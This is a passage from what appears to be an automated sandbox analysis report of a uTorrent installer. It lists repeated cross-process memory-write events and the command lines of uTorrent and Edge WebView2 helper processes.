PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
PID 1016 wrote to memory of 2108 N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe

"C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe"

C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe

"C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}

C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe

uTorrent.exe /NOINSTALL /BRINGTOFRONT

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB62E8_1570869978 µTorrent4823DF041B09 uTorrent ce unp

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB5948_408977520 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=1408.5068.16614229064555360265

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1b4,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB6080_1125046369 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=1984.4748.5186240804764680059

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1a8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=3152.3928.2209418904843276179

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe4,0x1bc,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB62E8_1863064785 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=4508.2444.15427354753745200292

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1b4,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1896,14695144487908411897,14174798435327063996,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,14695144487908411897,14174798435327063996,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1972 /prefetch:3

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1908,16530629815567354284,17614778898650241542,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,16530629815567354284,17614778898650241542,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1968 /prefetch:3

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2052 /prefetch:3

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,17033338692039194756,8420424883979609974,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US 